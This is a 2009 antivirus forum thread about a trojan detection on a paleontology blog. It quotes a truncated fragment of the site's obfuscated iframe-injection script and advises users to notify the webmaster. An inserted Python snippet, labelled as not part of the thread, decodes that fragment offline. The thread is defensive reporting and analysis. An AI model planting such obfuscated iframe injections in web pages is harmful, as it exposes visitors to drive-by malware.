Author Topic: Should I report an IFrame-EC to anyone?  (Read 4435 times)

cromag

  • Guest
Should I report an IFrame-EC to anyone?
« on: May 13, 2009, 10:51:44 AM »
I was surfing the net tonight in search of info on Paleontology -- specifically, pterosaurs -- and Avast alerted to an IFrame-EC trojan in a legitimate site:

Code:
5/13/2009 4:23:22 AM SYSTEM 284 Sign of "HTML:IFrame-EC [Trj]" has been found in "http://XXX.networlddirectory.com/blogs/permalinks/1-2009/watch-out-some-pterosaurs-take-off.html" file. 

I replaced the "w"s with "X"s to be safe.  If that's not good enough let me know (or an Admin can delete).


Anyway, the site has never given me a problem before -- should this be reported anywhere?

Thanks.

Offline jsejtko

  • Avast team
  • Full Member
  • *
  • Posts: 171
    • ALWIL Software
Re: Should I report an IFrame-EC to anyone?
« Reply #1 on: May 13, 2009, 01:21:15 PM »
Welcome cromag,

The website contains an obfuscated script at the end of the code - it contains an iframe that points to a malicious server. Please try to contact the webmaster/owner and tell him about this problem - it needs a fix from someone who has access to the server.

Best regards

PS: Attached image shows the infection - using red arrows.

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33895
  • malware fighter
Re: Should I report an IFrame-EC to anyone?
« Reply #2 on: May 13, 2009, 04:15:13 PM »
Hi cromag,

This detection is also found by unmaskparasites:
Code:
var k1='?gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>#ohiw=#4^#wrs=#4%A?liudph#vuf@%kwws=22',...

So the detection is a valid one, and you should contact the site admin or webmaster for that reason,

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!
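
An added example, not part of any post in this thread: one way to check offline, without running the script, that a fragment like the one quoted in Reply #2 hides an iframe. It tries small fixed character shifts and reports the one that yields iframe markup; that the encoding is a fixed shift is an inference from the quoted fragment, and the function names are hypothetical.

```python
"""Offline check of a quoted obfuscated-script fragment for a hidden iframe."""

# Truncated fragment exactly as quoted in Reply #2 (the remainder is elided there).
SAMPLE = '?gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>#ohiw=#4^#wrs=#4%A?liudph#vuf@%kwws=22'

# Strings that indicate an invisible injected frame once the text is decoded.
MARKERS = ("<iframe", "src=", "visibility", "hidden", "http://")


def shift_decode(text, shift):
    """Subtract `shift` from every code point; non-printable results become '.'."""
    out = []
    for ch in text:
        cp = ord(ch) - shift
        out.append(chr(cp) if 32 <= cp < 127 else ".")
    return "".join(out)


def score(decoded):
    """Count markers, but only if the iframe tag itself is present."""
    lowered = decoded.lower()
    if "<iframe" not in lowered:
        return 0
    return sum(marker in lowered for marker in MARKERS)


def find_hidden_iframe(text, max_shift=25):
    """Try shifts 1..max_shift; return (shift, decoded) for the best hit or None.

    Shift 0 is skipped on purpose: a plain-text iframe is not obfuscated.
    """
    best = None
    for shift in range(1, max_shift + 1):
        decoded = shift_decode(text, shift)
        hits = score(decoded)
        if hits and (best is None or hits > best[0]):
            best = (hits, shift, decoded)
    return (best[1], best[2]) if best else None


if __name__ == "__main__":
    result = find_hidden_iframe(SAMPLE)
    if result:
        print("shift %d -> %s" % result)
    else:
        print("no shifted iframe markup found")
```
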

cromag

  • Guest
Re: Should I report an IFrame-EC to anyone?
« Reply #3 on: May 13, 2009, 07:19:20 PM »
Thank you, I have sent an email to the webmaster.  Now I just hope it gets read.

If I encounter additional things like this (or, more likely "when ..." in today's world) should I touch base with the forum here to get the malware verified?


Thanks again.

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33895
  • malware fighter
Re: Should I report an IFrame-EC to anyone?
« Reply #4 on: May 13, 2009, 09:25:47 PM »
Hi cromag,

Well this clearly is our duty and our responsibility towards the users of the Internet. It is very important to report these things here if it is only that other users are aware of these things going on on today's Internet and more importantly what they can do to detect and protect themselves against these online infecting sites.
The user of the browser is protected through the avast shield protection, can enhance prevention by pre-scanning with real time site scanning like Finjan, use scandoo.com as a search engine or prevent malicious script from running inside the browser by installing NoScript in browsers like Firefox or Flock, and block requests from third party redirects through an extension like RequestPolicy. As the problem of malicious code injection to trusted vulnerable sites is expanding rapidly, appropriate prevention and protection has an important priority, and as one of the few AV solutions that take this ongoing threat seriously avast is doing a hell of a job and saved many users when visiting these suspicious or malware ridden websites,

polonus